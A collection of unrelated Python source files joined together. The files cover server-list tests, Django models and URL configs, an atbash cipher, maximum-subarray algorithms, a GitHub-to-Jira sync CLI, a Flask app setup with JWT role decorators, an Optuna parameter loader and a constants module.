self.assertNotIn(self.third_server.id, servers_list)
@tags(type='positive', net='no')
def test_list_servers_detailed_filter_by_flavor(self):
"""
Filter the list of servers with details by flavor.
This will call the list_servers_with_detail with the alternate flavor
that created the third server.
The following assertions occur:
- 200 status code from the http call.
- Server 1 and 2 are not in the list.
- Server 3 is in the list.
"""
params = self.flavor_ref_alt
list_response = self.servers_client.list_servers_with_detail(
flavor=params)
filtered_servers = list_response.entity
self.assertEqual(200, list_response.status_code)
self.assertNotIn(self.server, filtered_servers)
self.assertNotIn(self.second_server, filtered_servers)
self.assertIn(self.third_server, filtered_servers)
@tags(type='positive', net='no')
def test_list_servers_detailed_filter_by_server_name(self):
"""
Filter the list of servers with detail by name.
This will call the list_servers_with_details with the server name that
was created at startup. Then it will get the details of the first
server created during test set up and use that information to validate
that a detailed list of servers respects the server name filter.
The following assertions occur:
- 200 status code from the http call.
- Server 1 is in the list.
- Server 2 and 3 are not in the list.
"""
params = self.server.name
list_response = self.servers_client.list_servers_with_detail(
name=params)
filtered_servers = list_response.entity
self.assertEqual(200, list_response.status_code)
server_under_test = self.servers_client.get_server(
self.server.id).entity
self.assertIn(server_under_test, filtered_servers)
self.assertNotIn(self.second_server, filtered_servers)
self.assertNotIn(self.third_server, filtered_servers)
@tags(type='positive', net='no')
def test_list_servers_detailed_filter_by_server_status(self):
"""
Filter the list of servers with details by server status of active.
This will call the list_servers_with_detail with the status of active
expecting all servers to be returned.
The following assertions occur:
- 200 status code from the http call.
- Server 1, 2 and 3 are in the list.
"""
params = 'active'
list_response = self.servers_client.list_servers_with_detail(
status=params)
filtered_servers = list_response.entity
self.assertEqual(200, list_response.status_code)
servers_list = []
for i in filtered_servers:
servers_list.append(i.id)
self.assertIn(self.server.id, servers_list)
self.assertIn(self.second_server.id, servers_list)
self.assertIn(self.third_server.id, servers_list)
@tags(type='positive', net='no')
def test_list_servers_detailed_filter_by_changes_since(self):
"""
Filter the list of servers with details by changes-since.
This will call the list_servers_with_detail with the expectation of
all servers being returned in the list. The list will be of all
servers but will go through the entries and pull the id into a list
to compare against.
The following assertions occur:
- 200 status code from the http call.
- Server 1, 2 and 3's ids are in the generated list.
"""
params = self.server.created
# Filter the detailed list of servers by changes-since
list_response = self.servers_client.list_servers_with_detail(
changes_since=params)
filtered_servers = list_response.entity
self.assertEqual(200, list_response.status_code)
servers_list = []
for i in filtered_servers:
servers_list.append(i.id)
self.assertIn(self.server.id, servers_list)
self.assertIn(self.second_server.id, servers_list)
self.assertIn(self.third_server.id, servers_list)
|
# -*- coding: utf-8 -*-
from django.core.urlresolvers import reverse
from django.test import Client
from django.test import TestCase
from ckeditor_link.tests.test_app.models import TestModel, LinkModel
class ckeditor_linkDialogTests(TestCase):
    """Template-level tests for ckeditor_link rendering of TestModel pages."""
    # Fixture provides the TestModel / LinkModel rows the tests read.
    fixtures = ['test_app.json', ]
    def setUp(self):
        # pk=2 comes from the test_app.json fixture.
        self.test_object = TestModel.objects.get(pk=2)
    def tearDown(self):
        pass
    def test_tag_link_target_class_value(self):
        """
        does it transform everything as it should?
        """
        client = Client()
        url = reverse('testmodel_detail', args=[self.test_object.id])
        response = client.get(url)
        content = response.content
        # check it!
        # NOTE(review): no assertions yet -- `content` is fetched but the
        # transformed markup is never verified.
    def test_tag_no_destruction_of_existing_links(self):
        """
        normal existing <a href="xx" should not be tinkered with
        """
        pass
    def test_tag_robustness(self):
        """
        can it handle LinkModel with for example no get_css_class method?
        """
        client = Client()
        url = reverse('testmodel_detail', args=[self.test_object.id])
        response = client.get(url)
        content = response.content
        # check it!
        # NOTE(review): currently only checks that rendering does not raise.
|
from django.db import models
from netutils.modelfields import NetIPAddressField, NetIPNetworkField
class Bras(models.Model):
    """A BRAS (Broadband Remote Access Server) device."""
    name = models.CharField(max_length=200, db_index=True, unique=True)
    # Optional management address (validated IP via NetIPAddressField).
    management_ip = NetIPAddressField(blank=True, null=True)
    class Meta:
        verbose_name_plural = 'bras'
        ordering = ['name']
    def __str__(self):
        return self.name
class Vrf(models.Model):
    """A VRF (routing instance) defined on a particular BRAS."""
    bras = models.ForeignKey(Bras, db_index=True)
    number = models.IntegerField(db_index=True)
    name = models.CharField(max_length=200, db_index=True)
    class Meta:
        verbose_name_plural = 'vrf'
        ordering = ['bras__name', 'number', 'name']
        # Both the VRF number and the VRF name are unique per BRAS.
        unique_together = [
            ['bras', 'number'],
            ['bras', 'name'],
        ]
        index_together = [
            ['bras', 'number', 'name'],
            ['bras', 'name'],
        ]
    def __str__(self):
        return '%d %s (%s)' % (self.number, self.name, self.bras)
class Loopback(models.Model):
    """A loopback interface on a BRAS, optionally bound to a VRF."""
    bras = models.ForeignKey(Bras, db_index=True)
    number = models.IntegerField()
    ip = NetIPAddressField()
    vrf = models.ForeignKey(Vrf, blank=True, null=True)
    class Meta:
        ordering = ['bras__name', 'number']
        # A loopback number appears at most once per BRAS.
        unique_together = [
            ['bras', 'number'],
        ]
        index_together = [
            ['bras', 'number'],
        ]
    def __str__(self):
        # NOTE(review): the BRAS is not included here, so loopbacks on
        # different devices stringify identically -- confirm intended.
        return 'Loopback%d' % self.number
class Section(models.Model):
    """An IP network section served by a BRAS, optionally inside a VRF."""
    bras = models.ForeignKey(Bras, db_index=True)
    ipnetwork = NetIPNetworkField(db_index=True)
    description = models.CharField(max_length=200, blank=True)
    vrf = models.ForeignKey(Vrf, blank=True, null=True)
    class Meta:
        ordering = ['bras__name', 'ipnetwork']
        # A given network appears at most once per BRAS.
        unique_together = [
            ['bras', 'ipnetwork'],
        ]
        index_together = [
            ['bras', 'ipnetwork'],
        ]
    def __str__(self):
        return str(self.ipnetwork)
|
# Created by Nicolas on 07/12/2015 in Python 3.2
# The atbash cipher reverses the alphabet: a becomes z, b becomes y, and so on.
# Lookup table for the atbash substitution: each letter maps to its mirror
# in the alphabet (a<->z, b<->y, ...).  The French accented letters handled
# by the original if-chain map through their unaccented base letter.
_ATBASH = {
    'a': 'z', 'b': 'y', 'c': 'x', 'd': 'w', 'e': 'v', 'f': 'u', 'g': 't',
    'h': 's', 'i': 'r', 'j': 'q', 'k': 'p', 'l': 'o', 'm': 'n', 'n': 'm',
    'o': 'l', 'p': 'k', 'q': 'j', 'r': 'i', 's': 'h', 't': 'g', 'u': 'f',
    'v': 'e', 'w': 'd', 'x': 'c', 'y': 'b', 'z': 'a',
    # Accented characters mirror through their base letter.
    'à': 'z', 'ç': 'x', 'é': 'v', 'è': 'v', 'ê': 'v', 'ù': 'f',
}
def atbash(lettre):
    """Return the atbash (mirror-alphabet) substitution for ``lettre``.

    Fixes over the original 50-line if-chain:
      - Uppercase letters are now mirrored too, preserving case
        (previously they fell through and returned None, which callers
        stringified into the literal text "None").
      - Characters with no mapping are returned unchanged instead of None.
    """
    if lettre in _ATBASH:
        return _ATBASH[lettre]
    lower = lettre.lower()
    if lower in _ATBASH:
        # Mirror through the lowercase table, then restore the case.
        return _ATBASH[lower].upper()
    # Unknown character: pass it through untouched.
    return lettre
def miroir(messageClair):
    """Encode ``messageClair`` with the atbash cipher.

    Alphabetic characters are substituted via :func:`atbash`; every other
    character (spaces, digits, punctuation) is copied through unchanged.
    """
    encoded = []
    for caractere in messageClair:
        if caractere.isalpha():
            encoded.append(str(atbash(caractere)))
        else:
            # Non-letters are appended as-is.
            encoded.append(str(caractere))
    return "".join(encoded)
|
def max_subarray(array):
    """Brute-force maximum subarray: try every start index.

    Returns ``(low, high, max_sum)`` -- inclusive bounds of a maximum-sum
    contiguous subarray plus its sum.  Ties are broken in favour of the
    shortest span.  O(n^2) time.
    """
    size = len(array)
    best_low = best_high = 0
    best_sum = array[0]
    for start in range(size):
        running = array[start]
        # Single-element window; '>=' prefers the later (equally short) one.
        if running >= best_sum:
            best_sum = running
            best_low = best_high = start
        for end in range(start + 1, size):
            running += array[end]
            shorter_tie = (
                running == best_sum and end - start < best_high - best_low
            )
            if running > best_sum or shorter_tie:
                best_low, best_high = start, end
                best_sum = running
    return best_low, best_high, best_sum
def max_crossing_subarray(array, low, high, mid):
    """Best subarray of ``array[low..high]`` that straddles the midpoint.

    Scans left from ``mid`` and right from ``mid + 1``, then glues the two
    best half-sums together.  Returns ``(max_left, max_right, total)``.
    """
    best_left_sum, best_left = float("-Inf"), low
    running = 0
    for idx in range(mid, low - 1, -1):
        running += array[idx]
        if running > best_left_sum:
            best_left = idx
            best_left_sum = running
    best_right_sum, best_right = float("-Inf"), high
    running = 0
    for idx in range(mid + 1, high + 1):
        running += array[idx]
        if running > best_right_sum:
            best_right = idx
            best_right_sum = running
    return best_left, best_right, best_left_sum + best_right_sum
def max_subarray_recursive(array, low, high):
    """Divide-and-conquer maximum subarray on ``array[low..high]``.

    Returns ``(low, high, sum)``.  On equal sums the left candidate beats
    the right, and both beat the crossing candidate -- ``max`` keeps the
    first maximal tuple, so candidate order encodes the tie-breaking.
    """
    if low == high:
        # Base case: a single element is its own best subarray.
        return low, high, array[low]
    mid = (low + high) // 2
    candidates = (
        max_subarray_recursive(array, low, mid),
        max_subarray_recursive(array, mid + 1, high),
        max_crossing_subarray(array, low, high, mid),
    )
    return max(candidates, key=lambda result: result[2])
def max_subarray_divide_and_conquer(array):
    """Entry point for the O(n log n) divide-and-conquer maximum subarray.

    Returns ``(low, high, max_sum)`` over the whole array.
    """
    return max_subarray_recursive(array, 0, len(array) - 1)
def max_subarray_linear(numbers):
    """Kadane's algorithm: maximum subarray in a single O(n) pass.

    Returns ``(best_start, best_end, best_sum)`` with inclusive indices.
    """
    best_sum = float("-inf")
    best_start = best_end = 0  # or: None
    running = 0
    start = 0
    for end, value in enumerate(numbers):
        if running <= 0:
            # A non-positive prefix can never help: restart the run here.
            start = end
            running = value
        else:
            # Extend the run (max() is a no-op here since running > 0).
            running = max(running + value, value)
        if running > best_sum:
            best_sum = running
            best_start, best_end = start, end
    return best_start, best_end, best_sum
# a = [1, -4, 5, 1, -3]
# Demo inputs: first the CLRS example array, then an almost-all-negative case.
a = [13, -3, -25, 20, -3, -16, -23, 18, 20, -7, 12, -5, -22, 15, -4, 7]
a = [-4, -5, -4, 2, -7]  # NOTE: rebinds `a`; only this array is used below.
# All three implementations should agree on (low, high, max_sum).
print(max_subarray(a))
print(max_subarray_divide_and_conquer(a))
print(max_subarray_linear(a))
|
import click
import os
from passlib.context import CryptContext
from wrappers.jirawrapper import MyJiraWrapper
from plugins.jira_workflow import (
start_issue_workflow,
start_create_pull_requests_workflow,
start_review_pull_requests_workflow
)
from utils.utils import (
echo_success,
echo_error,
update_yaml,
configure_interval,
get_yaml_data
)
from plugins.github import (
GitHubPlugin,
)
class Config(object):
    """Shared CLI state injected into click commands via @pass_config."""
    def __init__(self):
        # YAML file where all persisted settings live.
        self.config_file = "config.yaml"
        # passlib context used by the encrypt/check password helpers below.
        self.pwd_context = CryptContext(
            schemes=["pbkdf2_sha256"],
            default="pbkdf2_sha256",
            pbkdf2_sha256__default_rounds=30000
        )
# Decorator that injects a (lazily created) Config into click commands.
pass_config = click.make_pass_decorator(Config, ensure=True)
def encrypt_password(pwd_context, password):
    """Hash *password* with the given passlib CryptContext.

    Uses ``CryptContext.hash()``: the older ``encrypt()`` name used before
    is a deprecated alias for the same operation (removed in passlib 2.0).
    """
    return pwd_context.hash(password)
def check_encrypted_password(pwd_context, password, hashed):
    """Return True if *password* matches the passlib *hashed* value."""
    return pwd_context.verify(password, hashed)
def set_config_properties(git_urls, config_dict):
    """Build the config mapping that gets persisted to the YAML file.

    ``git_urls`` is a comma-separated string (e.g. "airgun,robottelo");
    it is stored under 'git_urls' as a list of encoded project names.
    Extra key/value pairs from ``config_dict`` (may be None) are merged in.

    Bug fix: the original called ``.split(',')`` on *bytes*
    (``str(git_urls).encode().split(',')``), which raises TypeError on
    Python 3 because bytes.split needs a bytes separator.  The string is
    now split first and each entry encoded afterwards.
    """
    content = {'git_urls': [url.encode() for url in str(git_urls).split(',')]}
    if config_dict:
        content.update(config_dict)
    return content
def formatting(header, github_list):
    """Print *header* followed by the URL of every item in *github_list*.

    All output goes through ``echo_error`` (highlighted); an empty list
    prints a placeholder line instead.
    """
    echo_error("=================================")
    echo_error(header)
    echo_error("=================================")
    if not github_list:
        echo_error("No new item found !")
    else:
        for github_item in github_list:
            echo_error(github_item.data['url'])
    print("\n")
@click.group()
@click.option('--debug/--no-debug', default=False)
def cli(debug):
    """This CLI tool to sync and track GitHub issues, pr's, pr_reviews
    with Jira. Currently supported to only for create, update and
    close status.
    """
    # Root command group only; `debug` is accepted but not yet used by
    # any subcommand.  (Docstring above is click's user-visible help text.)
    pass
@cli.command()
@click.option('--git-urls', default=None, prompt=True,
              help="Pass the git project names for Jira sync e.g. airgun, robottelo")
@click.option('--jira-url', prompt=True, confirmation_prompt=False,
              help="Pass the Jira url")
@click.option('--github-username', default=None, prompt=True,
              help="Pass GitHub username")
@click.option('--jira-username', default=None, prompt=True,
              help="Pass Jira username")
@click.option('--jira-email-id', default=None, prompt=True,
              help="Pass Jira Email Id")
@click.option('--jira-board', prompt=True, confirmation_prompt=False,
              help='Pass the Jira board name')
@click.option('--jira-project', prompt=True, confirmation_prompt=False,
              help='Pass the Jira project name')
@pass_config
def set_config(config, git_urls, jira_url, github_username, jira_username,
               jira_email_id, jira_board, jira_project):
    """Set git_urls and github username"""
    # Start fresh: discard any previously persisted configuration.
    if os.path.exists(config.config_file):
        os.unlink(config.config_file)
    try:
        # All options are required; click prompts for them, but they can
        # still arrive as None when piped.
        if None not in (git_urls, github_username, jira_username, jira_email_id,
                        jira_board, jira_project, jira_url):
            auth_dict = {
                'kerberos': True,
                'basic_auth': False,
                'username': str(jira_username).encode()
            }
            content_dict = {
                'url': str(jira_url).encode(),
                'github_username': str(github_username).encode(),
                'board': str(jira_board).encode(),
                'project': str(jira_project).encode(),
                'email_id': str(jira_email_id).encode(),
                'auth': auth_dict,
                'ca_cert_path': "/etc/ssl/certs/ca-bundle.crt",
                'verify_ssl': True,
                'label_check': False,
                'check_for_updates': 'false'
            }
            content = set_config_properties(git_urls,
                                            content_dict)
            update_yaml(config.config_file, content)
            echo_success("Configs are set !")
            # NOTE(review): `jira` is never used -- presumably constructed
            # to validate the new settings against Jira; confirm.
            jira = MyJiraWrapper('config.yaml', 'labels.yaml')
        else:
            echo_error("Please Pass missing options!")
    except Exception as err:
        # NOTE(review): broad catch prints the error and exits 0; consider
        # narrowing and/or setting a non-zero exit code.
        click.echo(err)
@cli.command()
@click.option('--interval', default='week',
              help="please pass interval e.g. week, day")
@pass_config
def check_github_history(config, interval):
    """See GitHub History result based on intervals
    e.g. jirasync check-github-history --interval week """
    if interval not in ['week', 'day']:
        echo_error("Please pass correct interval. e.g. 'week', 'day'")
        exit(1)
    else:
        # Translate the symbolic interval into the range GitHub queries use.
        interval = configure_interval(interval)
        yaml_data = get_yaml_data(config.config_file)
        git_hub_plugin = GitHubPlugin(yaml_data['github_username'],
                                      yaml_data['email_id'],
                                      interval,
                                      yaml_data['git_urls']
                                      )
        # Collect each activity category, then pretty-print every bucket.
        issue_list = git_hub_plugin.get_github_issues_created_list()
        assigned_issue_list = git_hub_plugin.get_github_issues_assigned_list()
        pr_list = git_hub_plugin.get_opened_pull_requests()
        pr_closed_list = git_hub_plugin.get_pull_requests_merged_closed()
        pr_review_list_closed = git_hub_plugin.get_pull_requests_reviewed()
        pr_review_list_open = git_hub_plugin.get_pull_requests_review_in_progress()
        formatting('Issues Created', issue_list)
        formatting('Issues Assigned', assigned_issue_list)
        formatting('PR Raised', pr_list)
        formatting('PR Merged', pr_closed_list)
        formatting('PR Reviewed Closed Status', pr_review_list_closed)
        formatting('PR Reviewed Open Status', pr_review_list_open)
@cli.command()
@click.option('--interval', default='week',
              help="please pass interval e.g. week, day")
@pass_config
def start_syncing(config, interval):
    """Sync github issues, pr, pr_reviews as Jira tasks.
    Currently supported day and week interval
    e.g. jirasync start-syncing --interval week
    """
    if interval not in ['week', 'day']:
        echo_error("Please pass correct interval. e.g. 'week', 'day'")
        exit(1)
    else:
        interval = configure_interval(interval)
        yaml_data = get_yaml_data(config.config_file)
        git_hub_plugin = GitHubPlugin(yaml_data['github_username'],
                                      yaml_data['email_id'],
                                      interval, yaml_data['git_urls']
                                      )
        # Gather GitHub activity buckets to be mirrored into Jira.
        created_issue_list = git_hub_plugin.get_github_issues_created_list()
        assigned_issue_list = git_hub_plugin.get_github_issues_assigned_list()
        pr_list = git_hub_plugin.get_opened_pull_requests()
        pr_closed_list = git_hub_plugin.get_pull_requests_merged_closed()
        pr_review_list_closed = git_hub_plugin.get_pull_requests_reviewed()
        pr_review_list_open = git_hub_plugin.get_pull_requests_review_in_progress()
        jira = MyJiraWrapper('config.yaml', 'labels.yaml')
        # formatting('Issues Created', created_issue_list)
        # formatting('Issues Assigned', assigned_issue_list)
        # formatting('PR Raised', pr_list)
        # formatting('PR Merged', pr_closed_list)
        # formatting('PR Reviewed Closed Status', pr_review_list_closed)
        # formatting('PR Reviewed Open Status', pr_review_list_open)
        # Feed each bucket through its matching Jira workflow.
        start_issue_workflow(github_issues=created_issue_list, jira=jira)
        start_issue_workflow(github_issues=assigned_issue_list, jira=jira)
        start_create_pull_requests_workflow(github_issues=pr_list, jira=jira)
        start_create_pull_requests_workflow(github_issues=pr_closed_list, jira=jira)
        start_review_pull_requests_workflow(github_issues=pr_review_list_closed, jira=jira)
        start_review_pull_requests_workflow(github_issues=pr_review_list_open, jira=jira)
|
# Generated by Django 3.0 on 2019-12-11 23:14
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: renames Aluno.usuario to 'Usuario'.

    NOTE(review): the capitalised field name is unconventional for Python
    attributes -- confirm the rename direction was intended.
    """
    dependencies = [
        ('landing', '0002_aluno_usuario'),
    ]
    operations = [
        migrations.RenameField(
            model_name='aluno',
            old_name='usuario',
            new_name='Usuario',
        ),
    ]
|
# "Кругляши" (circles): count the enclosed loops in the digits of the input.
# Digits 0, 6 and 9 each contain one loop; 8 contains two.
# Improvements over the original: the unused `arr` list is removed and the
# per-digit if/elif chain is replaced by a lookup table; non-digit
# characters now contribute 0 instead of crashing int().
CIRCLES_PER_DIGIT = {'0': 1, '6': 1, '8': 2, '9': 1}
num = input()
count = sum(CIRCLES_PER_DIGIT.get(digit, 0) for digit in num)
print(count)
#from django.urls import path, re_path
from django.conf.urls import url
from django.urls import path
from . import views
app_name = 'cal'
urlpatterns = [
    # Legacy regex routes. NOTE(review): django.conf.urls.url is deprecated
    # since Django 2.0 and removed in 4.0 -- migrate to re_path/path.
    url(r'^index/$', views.index, name='index'),
    url(r'^calendar/$', views.CalendarView.as_view(), name='calendar'),
    url(r'^event/new/$', views.event, name='event_new'),
    url(r'^event/(?P<event_id>\d+)/$', views.event, name='event'),
    # NOTE(review): 'ical/' here is an unanchored regex, so it matches the
    # substring anywhere in the path -- confirm that is intended.
    url('ical/', views.ical, name='ical'),
    # Newer path()-style routes.
    path('manage_events', views.manage_events, name="manage_events"),
    path('add_event', views.add_event, name="add_event"),
    path('edit_event/<str:event_id>', views.edit_event, name="edit_event"),
    path('delete_event/<str:event_id>', views.delete_event, name="delete_event"),
]
from flask import Flask, request
from flask_restful import Resource, Api, reqparse
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager
from flask_jwt_extended import JWTManager, verify_jwt_in_request, get_jwt_claims
from datetime import timedelta
from functools import wraps
from flask_cors import CORS
import json, random, string, os
app = Flask(__name__)  # the Flask application instance (original: "membuat semua blueprint")
app.config["APP_DEBUG"] = True
CORS(app)
# JWT Config
# NOTE(review): the secret is regenerated on every process start, so all
# issued tokens are invalidated by a restart and multiple workers will
# disagree -- consider loading it from the environment instead.
app.config["JWT_SECRET_KEY"] = "".join(random.choice(string.ascii_letters) for i in range(32))
app.config["JWT_ACCESS_TOKEN_EXPIRES"] = timedelta(days=1)
jwt = JWTManager(app)
# SQLAlchemy Config
try:
    env = os.environ.get('FLASK_ENV', 'development')
    if env == 'testing':
        app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:@127.0.0.1:3306/rest_portofolio_test'
    else:
        # NOTE(review): both branches point at the *_test database, so the
        # env check currently has no effect -- confirm the non-test URI.
        app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:@127.0.0.1:3306/rest_portofolio_test'
except Exception as e:
    raise e
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db = SQLAlchemy(app)
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
#admin & non-admin authorization
def admin_required(fn):
    """Decorator: run *fn* only when the JWT claims mark an admin."""
    @wraps(fn)
    def wrapper(*args, **kwargs):
        # Raises if no valid JWT accompanies the request.
        verify_jwt_in_request()
        if get_jwt_claims()["is_admin"]:
            return fn(*args, **kwargs)
        return {"status": "FORBIDDEN", "message": "You should be an admin to access this point"}, 403
    return wrapper
def user_required(fn):
    """Decorator: run *fn* only when the JWT claims mark a non-admin user."""
    @wraps(fn)
    def wrapper(*args, **kwargs):
        # Raises if no valid JWT accompanies the request.
        verify_jwt_in_request()
        if not get_jwt_claims()["is_admin"]:
            return fn(*args, **kwargs)
        return {"status": "FORBIDDEN", "message": "You should be a user to access this point"}, 403
    return wrapper
@app.after_request
def after_request(response):
    """Log every request/response pair after the view has run.

    200 responses are logged at INFO, everything else at ERROR.
    Returns the response unchanged.

    Fixes: the bare ``except:`` (which also swallowed KeyboardInterrupt
    and SystemExit) is narrowed to ``Exception``, and the duplicated
    log-payload construction is collapsed into one call.
    """
    try:
        request_data = request.get_json()
    except Exception:
        # Body was not JSON (or was empty): fall back to the query string.
        request_data = request.args.to_dict()
    # Choose the log level once instead of repeating the payload per branch.
    log = app.logger.info if response.status_code == 200 else app.logger.error
    log("REQUEST_LOG\t%s", json.dumps({
        "method": request.method,
        "code": response.status,
        "request": request_data,
        "response": json.loads(response.data.decode("utf-8"))
    }))
    return response
# Blueprints are imported down here (after `app` and `db` exist) so the
# blueprint modules can import from this module without circular imports.
from blueprints.login import blueprint_login
from blueprints.users.resources import blueprint_user
from blueprints.shops.resources import blueprint_shop, blueprint_public_shop
from blueprints.products.resources import blueprint_product
from blueprints.blogs.resources import blueprint_blogs
from blueprints.carts.resources import blueprint_cart
from blueprints.checkout import blueprint_checkout
from blueprints.history import blueprint_history
from blueprints.admin import blueprint_admin
app.register_blueprint(blueprint_login, url_prefix="/users/login")
app.register_blueprint(blueprint_user, url_prefix="/users")
app.register_blueprint(blueprint_shop, url_prefix="/users/shops")
app.register_blueprint(blueprint_public_shop, url_prefix="/public/shops")
app.register_blueprint(blueprint_product, url_prefix="/public/products")
app.register_blueprint(blueprint_blogs, url_prefix="/public/blogs")
app.register_blueprint(blueprint_cart, url_prefix="/users/carts")
app.register_blueprint(blueprint_checkout, url_prefix="/users/checkout")
app.register_blueprint(blueprint_history, url_prefix="/users/history")
app.register_blueprint(blueprint_admin, url_prefix="/admin")
# Create any tables that don't exist yet, at import time.
db.create_all()
|
import logging
import warnings
warnings.filterwarnings("ignore")
logger = logging.getLogger(__name__)
supported_trials = [
"categorical",
"discrete_uniform",
"float",
"int",
"loguniform",
"uniform",
]
def trial_suggest_loader(trial, config):
    """Resolve one hyper-parameter from an Optuna ``trial``.

    ``config`` holds a ``type`` (one of ``supported_trials``) and a
    ``settings`` dict forwarded verbatim to the matching
    ``trial.suggest_*`` method.  Numeric results are cast to int/float to
    normalise whatever the backend returns.
    """
    _type = config["type"]
    assert (
        _type in supported_trials
    ), f"Type {_type} is not valid. Select from {supported_trials}"
    # Dispatch table: (result cast, suggest method) per supported type.
    cast, suggest = {
        "categorical": (lambda value: value, trial.suggest_categorical),
        "discrete_uniform": (int, trial.suggest_discrete_uniform),
        "float": (float, trial.suggest_float),
        "int": (int, trial.suggest_int),
        "loguniform": (float, trial.suggest_loguniform),
        "uniform": (float, trial.suggest_uniform),
    }[_type]
    return cast(suggest(**config["settings"]))
|
# -*- coding: utf-8 -*-
# Yes/No flag values (是/否)
import json
from django.http import HttpResponse
TRUE = '1'
FALSE = '0'
TRUE_INT = 1
FALSE_INT = 0
CHANNEL_SORT_DEFAULT = '100'
# Storage locations for images / files / attachments
PROPAGANDA_PIC = 'propaganda/'  # carousel promo images
CATELORY_TITLE_PIC = 'catelory/title'  # column header images
CATELORY_TYPE_INTRO_PIC = 'catelory/type_intro'  # column type-intro images
COMPONENT_PIC = 'component/pic'  # basic component images
QUICKFUNC_PIC = 'quickfunc'  # quick-function images
ARTICLE_COVER = 'article/%s/cover/%s'  # article cover (article/YYYYMM/cover/filename)
ARTICLE_IMAGE = 'article/%s/image/'  # article images (article/YYYYMM/image/)
ARTICLE_FILE = 'article/%s/file/'  # article attachments (article/YYYYMM/file/)
ARTICLE_VIDEO = 'article/%s/video/'  # article videos (article/YYYYMM/video/)
ARTICLE_IMAGE_TEMP = 'temp/%s/image/'  # staging area for article images
ARTICLE_IMAGE_FILE = 'temp/%s/file/'  # staging area for article attachments
ARTICLE_VIDEO_TEMP = 'temp/%s/video/'  # staging area for article videos
EXPERT_IMAGE = 'expert/image/%s'  # expert avatars
TEMP_IMAGE = 'temp/images/'  # temporary image location
# Static constants for column levels (superseded; kept for reference)
# IS_A_CHANNEL = '0'
# IS_A_CATEGORY = '1'
# IS_A_PUSH_CHANNEL = '9'
# Keys in the system-parameter table
NEW_PUBLISH_TIME = 'new_publish_time'
DEFAULT_ARTICLE_PIC = 'default_article_pic'
HOMEPAGE_REF_CPNT_KEYS = 'homepage_ref_cpnt_keys'
HOMEPAGE_REF_COL_KEYS = 'homepage_ref_col_keys'
CODE_CHANNEL = '1'  # marker: channel (top-level column)
CODE_CATEGORY = '2'  # marker: category (second-level column)
CODE_PUSH_CHANNEL = '9'  # marker: push channel
# --------------------- Static values for database fields ---------------------
DB_ARTICLE_ADMIT_STATE_PEND = 0  # article review: pending
DB_ARTICLE_ADMIT_STATE_PASS = 1  # article review: approved
DB_ARTICLE_ADMIT_STATE_FAIL = 2  # article review: rejected
DB_USER_ROLE_ADMIN = 0
DB_USER_ROLE_TEACHER = 1
DB_USER_ROLE_STUDENT = 2
DB_USER_ROLE_OTHER = 3
MANAGE_DRAFT_COMMON = 1  # plain article layout
MANAGE_DRAFT_PROFILE = 2  # personal-profile layout
MANAGE_DRAFT_PHOTO = 3  # photo-wall layout
MANAGE_DRAFT_JOURNAL = 4  # journal/periodical layout
JOB_STATE_PEND = 0  # pending
JOB_STATE_OK = 1  # succeeded
JOB_STATE_DEAL = 2  # in progress
JOB_STATE_FAIL = 3  # failed
def helper_const_list(request):
    """Return the constant table above as a JSON HttpResponse.

    Response shape: {"c": 0, "m": <message>, "d": [{code, value, intro}]}.
    The `intro` strings are user-facing runtime data (intentionally left
    in Chinese), not comments.
    """
    data = [
        {'code': 'FALSE', 'value': '0', 'intro': u'否(用于is_xxx字段)'},
        {'code': 'TRUE', 'value': '1', 'intro': u'是(用于is_xxx字段)'},
        {'code': 'DB_ARTICLE_ADMIT_STATE_PEND', 'value':'0', 'intro': u'文章审核状态:待审核'},
        {'code': 'DB_ARTICLE_ADMIT_STATE_PASS', 'value': '1', 'intro': u'文章审核状态:已通过审核'},
        {'code': 'DB_ARTICLE_ADMIT_STATE_FAIL', 'value': '2', 'intro': u'文章审核状态:未通过审核'},
        {'code': 'DB_USER_ROLE_ADMIN', 'value': '0', 'intro': u'角色:管理员'},
        {'code': 'DB_USER_ROLE_TEACHER', 'value': '1', 'intro': u'角色:普通教师'},
        {'code': 'DB_USER_ROLE_STUDENT', 'value': '2', 'intro': u'角色:学生'},
        {'code': 'DB_USER_ROLE_OTHER', 'value': '3', 'intro': u'角色:其它'},
        {'code': 'CODE_CHANNEL', 'value': '1', 'intro': u'标识:频道(一级栏目)'},
        {'code': 'CODE_CATEGORY', 'value': '2', 'intro': u'标识:栏目(二级栏目)'},
        {'code': 'CODE_PUSH_CHANNEL', 'value': '9', 'intro': u'标识:推送频道'},
        {'code': 'MANAGE_DRAFT_COMMON', 'value': '1', 'intro': u'一般文章展示型'},
        {'code': 'MANAGE_DRAFT_PROFILE', 'value': '2', 'intro': u'人物肖像展示型'},
        {'code': 'MANAGE_DRAFT_PHOTO', 'value': '3', 'intro': u'照片墙展示型'},
        {'code': 'MANAGE_DRAFT_JOURNAL', 'value': '4', 'intro': u'刊物展示型'},
        {'code': 'JOB_STATE_PEND', 'value': '0', 'intro': u'待处理'},
        {'code': 'JOB_STATE_OK', 'value': '1', 'intro': u'处理成功'},
        {'code': 'JOB_STATE_DEAL', 'value': '2', 'intro': u'处理中'},
        {'code': 'JOB_STATE_FAIL', 'value': '3', 'intro': u'处理失败'},
    ]
    # ensure_ascii=False keeps the Chinese text readable in the payload.
    dict_resp = {"c": 0, "m": u'请求完成', "d": data}
    return HttpResponse(json.dumps(dict_resp, ensure_ascii=False), content_type="application/json")
from django.urls import path, include
from django.contrib.auth import views as auth_views
from .views import SignUpView
urlpatterns = [
    # Account signup (custom view) plus the stock password-reset entry point.
    path('signup/', SignUpView.as_view(), name='signup'),
    path('password_reset/', auth_views.PasswordResetView.as_view(), name ='password_reset'),
]
# pathpatterns = [
# # path(r'^$', HomeView.as_view(), name='home'),
# re_path(r'^register/$', register_view, name='signup'),
# re_path(r'^activate/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
# activate, name='users_activate'),
# re_path('login/', auth_views.LoginView, {
# 'template_name': "users/registration/login.html"},
# name='login'),
# re_path('logout/', auth_views.LogoutView,
# {'next_page': settings.LOGIN_REDIRECT_path}, name='logout'),
# re_path(r'^password_reset/$', auth_views.PasswordResetView,
# {'template_name': "users/registration/password_reset_form.html"},
